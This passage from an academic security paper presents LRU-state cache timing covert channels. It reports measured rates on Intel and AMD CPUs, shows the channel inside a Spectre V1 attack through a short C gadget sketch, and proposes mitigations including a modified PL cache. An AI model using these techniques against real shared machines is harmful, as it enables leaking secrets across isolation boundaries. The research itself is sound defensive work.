When the sender and the receiver are sharing the same core in a time-sliced sharing setting, the two processes still share the same L1 cache. To evaluate the covert channel in a time-sliced sharing setting, we programmed the sender process to always send 1 or 0, and the receiver to measure the time of accessing line 0 every Tr cycles. Figure 6 shows the percentage of cache hits received for different d and Tr when the sender is sending 0 or 1 using Algorithm 1 on both CPUs tested. Each data point comes from 1000 measurements. As shown in Figure 6, with proper parameters, the receiver can distinguish between the sender sending 0 and 1. For example, if d = 8 and Tr = 10 cycles, the receiver will observe almost 100% L1 cache misses when the sender is sending 0, and about 30% L1 cache hits when the sender is sending 1, on both Intel processors. The receiver does not observe hits with a higher probability because, in time-sliced sharing, each process uses the core for a certain period of time. When the receiver monitors the sender in a loop, multiple loop iterations run within a time-slice period, and only the first iteration reflects the sender's behavior; the other iterations in the time period run without interleaving with the sender. Nevertheless, the receiver can still recognize the message the sender is sending by the percentage of cache hits received. About 10 measurements are then needed to differentiate the 30% hit rate from a near-zero one. A large Tr is needed here to have interaction between the two threads (about 10 cycles for both processors tested). However, if Tr is too large, the distinguishability decreases, as other processes might be scheduled during Tr. As shown in Figure 6, d = 8 and d = 7 give the best distinguishability between the sender sending 0 and 1. This is because Tr is large, and the time for the receiver's operations becomes small compared to the sleep time; thus, the context switch is more likely to happen during the sleep time.
In Algorithm 1, a greater d leads to fewer accesses to the target set after the sleep, and thus line 0 is less likely to be evicted during decoding; such an eviction of line 0 would result in a false 0. We also tried to demonstrate Algorithm 2 in the time-sliced setting but failed to observe any signal from the measurements. We think the reason is that Tr needs to be large to allow interference between the sender and the receiver; however, any other processes running during Tr could pollute the target set and introduce a lot of noise.

For power savings, the AMD L1 cache uses a special linear-address utag and way-predictor (see Section 2.6.2.2 in [45]). The utag is a hash of the linear address. For a load, while the physical address is looked up in the TLB, the L1 cache uses the hash of the linear address to match the utag and determine which cache way to use in the cache set. When the physical address is available, only that cache way is looked up instead of all 8 ways. So, when the physical address of a load matches a cache line in the cache but the utag of that way was set by a different linear address, a latency of an L1 miss will be observed (unless the hashes of the two linear addresses collide), even though the physical address matches and the data is in L1. This limits our Algorithm 1 across processes that use different address spaces. If the sender process accesses line 0, the utag of line 0 will be updated with the linear address of line 0 in the sender's address space.
Figure 7: Example sequences of the receiver's observations when the sender is sending 0 and 1 alternately using (top) Algorithm 1 and (bottom) Algorithm 2 on AMD EPYC 7571. For Algorithm 1, Tr = 1000, Ts = 10, d = 8, and the transmission rate is 22Kbps. For Algorithm 2, Tr = 1000, Ts = 10, d = 4, and the transmission rate is 25Kbps. The light blue dotted line shows the moving average.

Figure 8: Percentage of cache hits observed by the receiver on AMD EPYC 7571, when the sender and receiver are sharing a core in a time-sliced setting and the sender is sending (left) 0 and (right) 1 using Algorithm 1.
When the receiver accesses line 0 and measures the time, unless the hashes of the linear addresses of line 0 in the sender's process and in the receiver's process collide, the receiver will always observe an L1 cache miss latency, no matter whether line 0 is in L1 or not. However, the utag hash is not designed for security and could possibly be reverse-engineered. Furthermore, as long as the sender and the receiver are in the same address space, the LRU channel using Algorithm 1 still exists. For example, it can be used to transfer information in the case of escaping a sandbox in JavaScript [20].

We evaluate the characteristics of the LRU covert channel on the AMD EPYC 7571 processor on the Amazon AWS EC2 platform. Figure 7 (top) shows the trace observed by the receiver when the receiver and the sender are two threads in the same address space (using pthreads in C) running in hyper-threaded sharing using Algorithm 1. Due to the coarse granularity of the readout value of the time stamp counter on AMD, it is hard to identify the signal from the raw measurements (blue dots). The light blue dotted line in Figure 7 shows the moving average of the latency over 97 measurements, where 97 is the best-fit period of sending one bit for this trace. (The fact that the period does not equal Ts/Tr indicates that the threads do not get scheduled evenly. This might be due to the Amazon EC2 platform, as we observe a similar phenomenon on Intel processors on EC2.) When the sender is sending 0 and 1 alternately, the moving average shows a wave-like pattern, meaning the receiver can receive the message from the sender. By measuring the total time taken by the receiver to gather the trace and the period of each bit received, the effective transmission rate is 22Kbps. Due to the coarser granularity of the AMD time stamp counter and the lower frequency, the transmission rate of the channel is about one order of magnitude lower than on the Intel processors.

We also tested Algorithm 2 under hyper-threaded sharing on AMD EPYC 7571. Figure 7 (bottom) shows a trace observed by the receiver; here the receiver and the sender are two programs (in different memory spaces). Similarly, the light blue dotted line shows the moving average of the latency over 85 measurements, where 85 is the best fit, resulting in an effective transmission rate of 25Kbps. When the sender is sending 0 and 1 alternately, the moving average shows a wave-like pattern, meaning the receiver can receive the message from the sender. The measured latencies in Figure 7 (top) and (bottom) are quite different; this might be due to the processor running at a different frequency for power saving at the time of measurement.

We further tested Algorithm 1 under the time-sliced sharing setting using pthreads. Figure 8 shows the different results observed by the receiver when the sender is sending 0 and 1. The thresholds used to decide whether a latency represents a hit or a miss are selected to maximize the difference between 0 and 1. As shown in Figure 8, when Tr = 10 cycles, the receiver will receive about 70% L1 cache hits when the sender is sending 0, and about 77% L1 cache hits when the sender is sending 1. This is enough to differentiate 0 and 1, by examining whether the percentage of cache hits is below or above the threshold. The transmission rate is about 0.2 bits per second. When increasing Tr, more interleaving between the sender thread and the receiver thread happens during each measurement taken by the receiver, and the difference between 0 and 1 gets greater, indicating less noise. The parameter d does not play a significant role. We do not observe any signal using Algorithm 2 in time-sliced sharing, similar to the case for Intel.
Table 4 compares the transmission rate per cache set of the channels tested with different configurations. Hyper-threading gives a much higher transmission rate than time-sliced sharing because of more interference between the sender and the receiver. Under hyper-threading, Algorithm 1 and Algorithm 2 have similar transmission rates, which are comparable to other timing channels in caches [5, 7]. However, recall that Algorithm 2 is easily affected by noise due to the activities of other programs, but the noise is easy to filter, because the noise activity is usually of a different frequency. The LRU channel on AMD processors is about one order of magnitude slower than on Intel processors, due to the coarser granularity of the readout value of the time stamp counter and the lower clock frequency.

Table 4: Transmission rate of the evaluated LRU channels (Algorithm 1 and Algorithm 2, under hyper-threaded and time-sliced sharing, on the Intel and AMD processors tested).
6. STEALTHINESS OF LRU CHANNELS
In most of the existing cache side channels, the receiver directly measures whether a certain cache line exists in the cache. For example, in the Flush+Reload attack [2], the sender fetches a cache line into the cache, and the receiver measures directly whether a certain cache line is in the cache. To build a channel, a cache replacement must happen due to the sender's access. Meanwhile, in our LRU cache channel, the sender's operations do not need to cause any cache replacements, because the LRU states are updated on both cache hits and misses. Instead, the cache replacement happens when the receiver wants to measure the LRU state during the decoding phase. This makes the LRU channel more stealthy on the sender's side.

Table 5 shows the encoding time of the sender. The encoding times in the table include the time to calculate the victim address. For the LRU channels, it is assumed that the victim line is already in the cache before the attack. The LRU channels are compared with the Flush+Reload channels. We implemented two variants: the one denoted by F+R (mem) uses the clflush instruction to flush the data all the way down to memory, while the one denoted by F+R (L1) uses eight accesses to the L1 cache set to evict the data from L1. As shown in the table, both LRU channels require less encoding time than the F+R channels, because for the LRU channels the sender can encode the message with cache hits, while the Flush+Reload channels always require the sender to have cache misses in the target cache level.

Table 6 shows the cache miss rate of the sender process, measured using the Linux perf tool from hardware performance counters. (We do not have access to the hardware performance counters on the AMD machines on Amazon AWS, so only results from local Intel machines are shown in Table 6.) The results show that the sender of LRU Algorithm 1 and Algorithm 2 has a smaller L1 cache miss rate than Flush+Reload. To provide a baseline with no attack, we also show the results when there is only the sender process running on the physical core (denoted by sender only) and the results with the sender sharing the physical core with a benign gcc workload (denoted by sender & gcc). When there is only the sender process, it has the smallest L1 miss rate. (The sender only case still has a relatively high L2 and LLC miss rate due to fewer references to the L2 and LLC.) When the sender is sharing the core with a benign program, the benign program, e.g., gcc, causes contention in the cache similar to or even bigger than the contention due to the receiver in the LRU channel. Hence, if a victim wants to detect potential cache side-channel attacks using performance counters [46, 47, 48], the LRU channel is difficult to detect, as it may not be distinguishable from the contention due to benign programs.
Table 5: Latency of Encoding (cycles).
                          F+R (mem)   F+R (L1)   L1 LRU (Alg.1&2)
  Intel Xeon E5-2690      336         35         31
  Intel Xeon E3-1245 v5   288         40         35
  AMD EPYC 7571           232         56         52
Table 6: Cache Miss Rate of the Sender Process.
                               F+R (mem)   F+R (L1)   L1 LRU Alg.1   L1 LRU Alg.2   sender & gcc   sender only
  Intel Xeon E5-2690     L1D   0.07%       0.04%      0.03%          0.03%          0.03%          0.01%
                         L2    62%         6.67%      9.59%          15.6%          31%            8.32%
                         LLC   88%         0.77%      0.71%          1.07%          61%            1.46%
  Intel Xeon E3-1245 v5  L1D   0.06%       0.02%      0.01%          0.01%          0.01%          0.00%
                         L2    63%         11%        17%            14%            48%            26%
                         LLC   92%         8.12%      8.15%          7.42%          70%            27%
Table 7: Cache Miss Rate of Spectre V1 Attack.
                               F+R (mem)   F+R (L1)   L1 LRU Alg.1   L1 LRU Alg.2
  Intel Xeon E5-2690     L1D   2.75%       4.73%      4.19%          4.75%
                         L2    7.58%       0.07%      0.11%          0.09%
                         LLC   98.15%      0.87%      0.72%          0.87%
  Intel Xeon E3-1245 v5  L1D   2.86%       4.84%      4.13%          4.86%
                         L2    7.39%       0.49%      0.71%          0.45%
                         LLC   91.17%      1.83%      0.74%          0.96%
7. LRU CHANNELS IN TRANSIENT EXECUTION ATTACKS
Transient execution attacks, e.g., Spectre, leverage transient execution to access a secret and a covert channel to pass the secret to the attacker [20, 21, 22]. Currently, most proof-of-concept code for transient execution attacks uses the cache Flush+Reload covert channel. Here we demonstrate that our LRU covert channel also works with Spectre to retrieve the secret. Note that here the secret contains more than 1 bit, and multiple cache sets are used to encode the secret. In practice, 63 cache sets are used (both the Intel and AMD processors tested have 64 sets; the remaining set is used for the 7 elements of the pointer chasing algorithm, as discussed in Section 4.4). The Flush+Reload covert channel needs one memory access depending on the secret as the sender's operation. Meanwhile, as shown in both algorithms in Section 4, the sender's operation in the LRU channels also only needs one memory access, whose target set depends on the secret. Thus, the victim code using the LRU channel can be identical to the disclosure gadget in the Flush+Reload channel. Therefore, when demonstrating the transient execution attack using the LRU channels, we take the Spectre variant 1 attack sample code [20], keep the victim (sender) code the same, and change the attacker (receiver) code to use the L1 LRU channels as the disclosure primitive instead. We are able to launch the Spectre attack using the LRU channels (both Algorithm 1 and 2) to observe the secret. Also, Table 7 shows the cache miss rate (including both the victim and the attacker) during a Spectre attack.
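For illustration, a hedged sketch of the sender side of such an attack is shown below. It mirrors the victim gadget of the public Spectre V1 proof-of-concept [20] (array names follow that code); the stride of 64 bytes is our own choice so that different secret byte values map to different L1 sets, and the receiver side is the decoding phase of Algorithm 1 or 2 run on the monitored sets.

    #include <stddef.h>
    #include <stdint.h>

    extern uint8_t          array1[16];          /* in-bounds victim data            */
    extern size_t           array1_size;
    extern volatile uint8_t array2[256 * 64];    /* one L1 set per secret byte value */

    /* Victim (sender) gadget: under misspeculation, x indexes out of bounds and
     * the dependent load touches the set selected by the secret byte. With the
     * LRU channel this access can be a cache hit; no cache miss is required,
     * so only a short speculation window is needed. */
    void victim_function(size_t x) {
        if (x < array1_size)
            (void)array2[array1[x] * 64];
    }

    /* Receiver (attacker): for each monitored set, run the initialization phase,
     * trigger victim_function() with an out-of-bounds x, then run the decoding
     * phase and time line 0 to learn which set's LRU state was touched. */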
Figure 9:
PL cache replacement logic flow-chart. White boxes show the original PL cache design in [27]. Blue boxes show the new PL logic added in our simulation to defend against the LRU attack.
Figure 10:
Simulation results of the LRU attack using Algorithm 2 in gem5 with (top) the original PL cache design and (bottom) the new PL cache design, which locks the LRU state to defend against the LRU attack.
Compared to the Flush+Reload channel, the advantage of the LRU disclosure primitive is its short encoding time (i.e., the sender's operations); thus, a smaller speculation window is required, which may make the attack more dangerous and harder to defend against.
8. LRU ATTACK AND SECURE CACHES
Several designs have been proposed to defend against conventional and transient execution attacks using partitioning or randomization. Defenses against transient execution attacks that stop the transient execution but leave the covert channel open, such as [49], are not the focus of this paper.
Partitioning:
Many secure caches partition the cache (tag and data) between the victim and the attacker [26, 27, 28, 29, 50], but the replacement policy is not considered or specified. For example, in the Partition-Locked (PL) cache [27], each cache line is extended with one lock bit. When a cache line is locked, the line will not be evicted by any cache replacement until it is unlocked, to protect the line, as shown in Figure 9. If a locked line is chosen as the victim to be replaced, the replacement will not happen, and the incoming line will be handled uncached. It has been shown that the PL cache can effectively defend against Flush+Reload, Prime+Probe, and other attacks.

But the LRU state will still be updated on accesses to a locked cache line, and the update will affect the LRU states of the other lines. We implemented the PL cache using a PLRU replacement algorithm in the gem5 simulator and tested the LRU attack. During the test, line N (the line accessed by the sender) is first locked by the sender, and Algorithm 2 is used to build a channel. (Algorithm 1 is protected by the PL cache when line 0 is locked, because line 0 will not be evicted in the decoding phase, and the receiver will always get a cache hit no matter what the sender is sending.) As shown in Figure 10 (top), with the original design, the receiver can still receive the secret by observing the time of accessing line 0. This is because the sender's access to the locked line will change the eviction order of the lines that are not locked, which can be observed by the receiver later. To mitigate the LRU channel, the LRU state should be locked as well. We add the blue boxes in Figure 9 to the PL cache design. In this way, the receiver will always observe a cache hit, and thus not learn any information, as shown in Figure 10 (bottom).

Other work, such as DAWG [31], also proposes to partition the cache and the PLRU states in a cache set between protection domains, which mitigates the LRU channel. We are unaware of any other designs that partition the LRU states, and secure cache designers need to be careful to consider LRU-based attacks. To mitigate transient execution cache side-channel attacks, InvisiSpec [35] proposes to only update microarchitectural states (including the LRU state) after the access is no longer speculative, so the LRU channels cannot be used in transient execution attacks if the InvisiSpec defense is applied.
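To make the fix to the PL cache concrete, the sketch below shows the access-handling decision with the added LRU-state lock (the blue boxes in Figure 9). The structure and names are our own, not gem5's implementation; plru_victim()/plru_touch() are the Tree-PLRU helpers sketched in Section 2.

    #include <stdint.h>

    extern int  plru_victim(void);
    extern void plru_touch(int way);

    typedef struct { int valid; int locked; uint64_t tag; } pl_line_t;

    /* 'hit_way' is the matching way on a hit, or -1 on a miss. */
    void pl_cache_access(pl_line_t *set, int hit_way, uint64_t tag) {
        if (hit_way >= 0) {                 /* cache hit                            */
            if (!set[hit_way].locked)       /* added rule: accesses to locked lines */
                plru_touch(hit_way);        /* no longer update the PLRU state      */
            return;
        }
        int victim = plru_victim();         /* cache miss: candidate way from PLRU  */
        if (set[victim].locked)             /* original PL cache rule: never evict  */
            return;                         /* a locked line; handle it uncached    */
        set[victim].valid = 1;
        set[victim].tag   = tag;
        plru_touch(victim);
    }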
Randomization:
Other secure cache designs use randomization. For example, the Random Fill cache [32] decouples an access from the cache line brought into the cache by fetching a random cache line instead of the cache line being accessed. However, if the cache line is already in the cache, the replacement state will still be updated on the cache hit, and the LRU channel could still work. Meanwhile, some designs randomize the mapping between addresses and cache sets, such as Newcache, the RP cache, or the CEASER cache [27, 33, 51], so the receiver (and the sender) cannot map their addresses to the target cache set to build a channel.
9. DEFENDING THE LRU CHANNELS
The LRU timing-based channels leverage the fact that the sender and the receiver share the LRU states in caches. Thus, there are several possible approaches to defend against the LRU timing-based channels. Other than the secure caches mentioned in Section 8, another mitigation is to use a different cache replacement policy instead of LRU or PLRU. In this way, no LRU state exists anymore, and the channel is removed.
Random Replacement Policy:
A random replacement policy does not need any state in the cache. Every time a replacement is needed, a random cache way in the cache set is evicted. For simplicity, most ARM processors use a pseudo-random replacement policy [52], and they naturally defend against the LRU attack.
FIFO Replacement Policy:
First-In First-Out (or Round-Robin) replacement selects the oldest cache line fetched into the cache as the victim. State is still required to store the history of cache lines fetched into the cache, and thus the FIFO state still contains more information than simply which cache lines are present in the cache. However, different from LRU, the FIFO state is only updated when a new cache line is brought into the cache on a cache miss. Thus, the sender would have to trigger a cache miss for the FIFO state change to be observable by the receiver, similar to the existing cache channels.
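A minimal sketch of such a FIFO (round-robin) policy for one 8-way set is shown below (our own illustration); the only state is a fill pointer, and it changes only on misses, so the sender's cache hits leave nothing for the receiver to observe.

    #define FIFO_WAYS 8
    static int fifo_next;                          /* next way to replace in this set */

    int fifo_victim_and_advance(void) {
        int victim = fifo_next;
        fifo_next = (fifo_next + 1) % FIFO_WAYS;   /* updated only when a line is filled */
        return victim;
    }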
Performance Evaluation of Random and FIFO Policies:
The LRU replacement policy is widely used in processors because of its performance. In this section, we evaluate the performance of different replacement policies in the gem5 simulator [53]. We simulated a single out-of-order CPU core and a memory system with 2-level caches (32KiB 4-way L1I, 64KiB 8-way L1D with a latency of 4 cycles, 2MiB 16-way L2 with a latency of 8 cycles, and a main memory latency of 50 ns). The SPEC 2006 int and float benchmarks were tested [54]. Since we focus on the LRU channels in the L1 data cache, we tested the different replacement policies in the L1 data cache.

Figure 11: (top) Cache miss rate of the L1 data cache and (bottom) normalized CPI when different cache replacement policies (Tree-PLRU, FIFO, random) are used in the L1 data cache. The results are normalized to the result of the Tree-PLRU policy.

As shown in Figure 11 (top), compared to Tree-PLRU, the FIFO and Random replacement policies give a small degradation in the L1 data cache miss rate overall. Depending on the benchmark, the FIFO and Random replacement policies sometimes even have a lower cache miss rate than Tree-PLRU. Since an L1 miss can still hit in L2, the overall CPU performance, indicated by cycles per instruction (CPI) in Figure 11 (bottom), changes by less than 2% compared to the baseline. Thus, using a different replacement policy in the L1 data cache to mitigate the LRU side and covert channels introduces only a small overhead while increasing security. Similarly, if the channels in all levels of the cache are to be mitigated, the replacement policies of all cache levels need to be changed.
10. CONCLUSION
We presented novel timing-based channels leveraging the cache LRU replacement states. We designed two protocols to transfer information between processes using the LRU states, both for the case when there is shared memory between the sender and the receiver and when there is no shared memory. We also demonstrated the LRU channels on real-world commercial processors. The LRU channels only require an access (cache hit or miss) from the sender, while all the existing state-based, timing-based cache side and covert channels need the sender to trigger a cache replacement (a cache miss). Thus, the LRU channel has a shorter encoding time, a lower cache miss rate for the sender, and requires a smaller speculation window in transient execution attack scenarios. We showed that the new LRU channels also affect current secure cache designs. In the end, we proposed and evaluated several methods to mitigate the LRU channel, including a modified design of the secure PL cache.
Acknowledgement
We would like to thank the authors of InvisiSpec [35], especially Mengjia Yan, for their open-source code and scripts. Special thanks to Linbo Shao and Junwen Shao for helping with the gem5 simulation. We would like to acknowledge Amazon for providing AWS Cloud Credits for Research. This work was supported by NSF 1651945 and 1813797, and through SRC award number 2844.001.
11. REFERENCES
[1] J. Szefer, "Survey of microarchitectural side and covert channels, attacks, and defenses,"
Journal of Hardware andSystems Security , vol. 3, pp. 219–234, Sept. 2019.[2] Y. Yarom and K. Falkner, “FLUSH+ RELOAD: a highresolution, low noise, L3 cache side-channel attack,” in
USENIX Security Symposium (USENIX) , pp. 719–732,2014.[3] D. A. Osvik, A. Shamir, and E. Tromer, “Cache attacksand countermeasures: the case of AES,” in
Cryptographers’Track at the RSA Conference , pp. 1–20, 2006. [4] J. Bonneau and I. Mironov, “Cache-collision timing attacksagainst AES,” in
International Workshop on CryptographicHardware and Embedded Systems (CHES) , pp. 201–215,2006.[5] F. Liu, Y. Yarom, Q. Ge, G. Heiser, and R. B. Lee,“Last-level cache side-channel attacks are practical,” in
Symposium on Security and Privacy (S&P) , pp. 605–622,2015.[6] M. Yan, R. Sprabery, B. Gopireddy, C. Fletcher,R. Campbell, and J. Torrellas, “Attack directories, notcaches: Side channel attacks in a non-inclusive world,” in
Symposium on Security and Privacy (S&P) , 2019.[7] F. Yao, M. Doroslovacki, and G. Venkataramani, “AreCoherence Protocol States Vulnerable to InformationLeakage?,” in
International Symposium on HighPerformance Computer Architecture (HPCA) , pp. 168–179,2018.[8] Z. Wang and R. B. Lee, “Covert and side channels due toprocessor architecture,” in
Annual Computer SecurityApplications Conference (ACSAC) , pp. 473–482, 2006.[9] Y. Yarom, D. Genkin, and N. Heninger, “CacheBleed: atiming attack on OpenSSL constant-time RSA,”
Journal ofCryptographic Engineering , vol. 7, no. 2, pp. 99–112, 2017.[10] M. Schwarz, M. Schwarzl, M. Lipp, J. Masters, andD. Gruss, “Netspectre: Read arbitrary memory overnetwork,” in
European Symposium on Research inComputer Security (ESORICS) , pp. 279–299, 2019.[11] A. Moghimi, J. Wichelmann, T. Eisenbarth, and B. Sunar,“Memjam: A false dependency attack against constant-timecrypto implementations,”
International Journal of ParallelProgramming , vol. 47, no. 4, pp. 538–570, 2019.[12] A. C. Aldaya, B. B. Brumley, S. ul Hassan, C. P. Garc´ıa,and N. Tuveri, “Port contention for fun and profit,” in
Symposium on Security and Privacy (S&P) , pp. 870–887,2019.[13] A. Bhattacharyya, A. Sandulescu, M. Neugschwandtner,A. Sorniotti, B. Falsafi, M. Payer, and A. Kurmus,“SMoTherSpectre: exploiting speculative execution throughport contention,” arXiv preprint arXiv:1903.01843 , 2019.[14] D. Evtyushkin, R. Riley, N. C. Abu-Ghazaleh,D. Ponomarev, et al. , “Branchscope: A new side-channelattack on directional branch predictor,” in
ACM SIGPLANNotices , vol. 53, pp. 693–707, ACM, 2018.[15] D. Evtyushkin, D. Ponomarev, and N. Abu-Ghazaleh,“Jump over ASLR: Attacking branch predictors to bypassASLR,” in
International Symposium on Microarchitecture(MICRO) , p. 40, 2016.[16] D. Gullasch, E. Bangerter, and S. Krenn, “Cachegames–Bringing access-based cache attacks on AES topractice,” in
Symposium on Security and Privacy (S&P) ,pp. 490–505, 2011.[17] C. Percival, “Cache missing for fun and profit,” 2005.[18] D. J. Bernstein, “Cache-timing attacks on AES,” 2005.[19] O. Acıi¸cmez and ¸C. K. Ko¸c, “Trace-driven cache attacks onAES (short paper),” in
International Conference onInformation and Communications Security , pp. 112–121,2006.[20] P. Kocher, J. Horn, A. Fogh, , D. Genkin, D. Gruss,W. Haas, M. Hamburg, M. Lipp, S. Mangard, T. Prescher,M. Schwarz, and Y. Yarom, “Spectre Attacks: ExploitingSpeculative Execution,” in
Symposium on Security andPrivacy (S&P) , 2019.[21] M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas,A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin,Y. Yarom, and M. Hamburg, “Meltdown: Reading KernelMemory from User Space,” in
USENIX SecuritySymposium (USENIX) , 2018.[22] C. Canella, J. Van Bulck, M. Schwarz, M. Lipp,B. Von Berg, P. Ortner, F. Piessens, D. Evtyushkin, andD. Gruss, “A systematic evaluation of transient executionattacks and defenses,” in
USENIX Security SymposiumUSENIX) , pp. 249–266, 2019.[23] K. So and R. N. Rechtschaffen, “Cache operations by MRUchange,”
IEEE Transactions on Computers , vol. 37, no. 6,pp. 700–709, 1988.[24] A. Malamy, R. N. Patel, and N. M. Hayes, “Methods andapparatus for implementing a pseudo-lru cache memoryreplacement scheme with a locking feature,” 1994. USPatent 5,353,425.[25] J. Nomani and J. Szefer, “Predicting program phases anddefending against side-channel attacks using hardwareperformance counters,” in
Workshop on Hardware Supportfor Security and Privacy (HASP) , June 2015.[26] R. B. Lee, P. Kwan, J. P. McGregor, J. Dwoskin, andZ. Wang, “Architecture for protecting critical secrets inmicroprocessors,” in
ACM SIGARCH ComputerArchitecture News , vol. 33, pp. 2–13, 2005.[27] Z. Wang and R. B. Lee, “New cache designs for thwartingsoftware cache-based side channel attacks,” in
ACMSIGARCH Computer Architecture News , vol. 35,pp. 494–505, 2007.[28] L. Domnitser, A. Jaleel, J. Loew, N. Abu-Ghazaleh, andD. Ponomarev, “Non-monopolizable caches:Low-complexity mitigation of cache side channel attacks,”
ACM Transactions on Architecture and Code Optimization(TACO) , vol. 8, no. 4, p. 35, 2012.[29] D. Zhang, A. Askarov, and A. C. Myers, “Language-basedcontrol and mitigation of timing channels,”
ACMSIGPLAN Notices , vol. 47, no. 6, pp. 99–110, 2012.[30] M. Yan, B. Gopireddy, T. Shull, and J. Torrellas, “SecureHierarchy-Aware Cache Replacement Policy (SHARP):Defending Against Cache-Based Side Channel Attacks,” in
Annual International Symposium on ComputerArchitecture (ISCA) , pp. 347–360, 2017.[31] V. Kiriansky, I. Lebedev, S. Amarasinghe, S. Devadas, andJ. Emer, “DAWG: A defense against cache timing attacksin speculative execution processors,” in
InternationalSymposium on Microarchitecture (MICRO) , pp. 974–987,2018.[32] F. Liu and R. B. Lee, “Random fill cache architecture,” in
International Symposium on Microarchitecture (MICRO) ,pp. 203–215, 2014.[33] F. Liu, H. Wu, K. Mai, and R. B. Lee, “Newcache: Securecache architecture thwarting cache side-channel attacks,”
IEEE Micro , vol. 36, no. 5, pp. 8–16, 2016.[34] G. Keramidas, A. Antonopoulos, D. N. Serpanos, andS. Kaxiras, “Non deterministic caches: A simple andeffective defense against side channel attacks,”
DesignAutomation for Embedded Systems , vol. 12, no. 3,pp. 221–230, 2008.[35] M. Yan, J. Choi, D. Skarlatos, A. Morrison, C. Fletcher,and J. Torrellas, “InvisiSpec: Making SpeculativeExecution Invisible in the Cache Hierarchy,” in
International Symposium on Microarchitecture (MICRO) ,pp. 428–441, 2018.[36] K. N. Khasawneh, E. M. Koruyeh, C. Song, D. Evtyushkin,D. Ponomarev, and N. Abu-Ghazaleh, “Safespec: Banishingthe spectre of a meltdown with leakage-free speculation,” in
Design Automation Conference (DAC) , pp. 1–6, 2019.[37] A. Jaleel, K. B. Theobald, S. C. Steely Jr, and J. Emer,“High performance cache replacement using re-referenceinterval prediction (RRIP),” in
ACM SIGARCH ComputerArchitecture News , vol. 38, pp. 60–71, ACM, 2010.[38] M. K. Qureshi, A. Jaleel, Y. N. Patt, S. C. Steely, andJ. Emer, “Adaptive insertion policies for high performancecaching,”
ACM SIGARCH Computer Architecture News ,vol. 35, no. 2, pp. 381–391, 2007. [39] T. Ristenpart, E. Tromer, H. Shacham, and S. Savage,“Hey, you, get off of my cloud: exploring informationleakage in third-party compute clouds,” in
Conference onComputer and Communications Security (CCS) ,pp. 199–212, 2009.[40] Y. Zhang, A. Juels, M. K. Reiter, and T. Ristenpart,“Cross-tenant side-channel attacks in PaaS clouds,” in
Conference on Computer and Communications Security(CCS) , pp. 990–1003, 2014.[41] E. M. Koruyeh, K. N. Khasawneh, C. Song, andN. Abu-Ghazaleh, “Spectre returns! speculation attacksusing the return stack buffer,” in , 2018.[42] G. Maisuradze and C. Rossow, “ret2spec: Speculativeexecution using return stack buffers,” in
Conference onComputer and Communications Security (CCS) ,pp. 2109–2122, 2018.[43] S. Briongos, P. Malag´on, J. M. Moya, and T. Eisenbarth,“RELOAD+REFRESH: Abusing Cache ReplacementPolicies to Perform Stealthy Cache Attacks,” arXiv preprintarXiv:1904.06278 , 2019.[44] G. Navarro, “A guided tour to approximate stringmatching,”
ACM computing surveys (CSUR) , vol. 33,no. 1, pp. 31–88, 2001.[45]
Software Optimization Guide for AMD Family 17hProcessors . https://developer.amd.com/wordpress/media/2013/12/55723_SOG_Fam_17h_Processors_3.00.pdf ,accessed Feb. 2019.[46] T. Zhang, Y. Zhang, and R. B. Lee, “Cloudradar: Areal-time side-channel attack detection system in clouds,”in International Symposium on Research in Attacks,Intrusions, and Defenses (RAID) , pp. 118–140, 2016.[47] M. Chiappetta, E. Savas, and C. Yilmaz, “Real timedetection of cache-based side-channel attacks usinghardware performance counters,”
Applied Soft Computing ,vol. 49, pp. 1162–1174, 2016.[48] M. Alam, S. Bhattacharya, D. Mukhopadhyay, andS. Bhattacharya, “Performance Counters to Rescue: AMachine Learning based safeguard againstMicro-architectural Side-Channel-Attacks,”
IACRCryptology ePrint Archive , vol. 2017, p. 564, 2017.[49] M. Taram, A. Venkat, and D. Tullsen, “Context-sensitivefencing: Securing speculative execution via microcodecustomization,” in
International Conference onArchitectural Support for Programming Languages andOperating Systems (ASPLOS) , pp. 395–410, 2019.[50] V. Costan, I. Lebedev, and S. Devadas, “Sanctum: Minimalhardware extensions for strong software isolation,” in
USENIX Security Symposium (USENIX) , pp. 857–874,2016.[51] M. K. Qureshi, “CEASER: Mitigating Conflict-BasedCache Attacks via Encrypted-Address and Remapping,” in
International Symposium on Microarchitecture (MICRO) ,pp. 775–787, 2018.[52]
ARM1176JZF-S Technical Reference Manual . http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0301h/ch07s02s01.html , accessed Aug. 2019.[53] N. Binkert, B. Beckmann, G. Black, S. K. Reinhardt,A. Saidi, A. Basu, J. Hestness, D. R. Hower, T. Krishna,S. Sardashti, et al. , “The GEM5 simulator,” ACMSIGARCH Computer Architecture News , vol. 39, no. 2,pp. 1–7, 2011.[54] J. L. Henning, “SPEC CPU2006 benchmark descriptions,”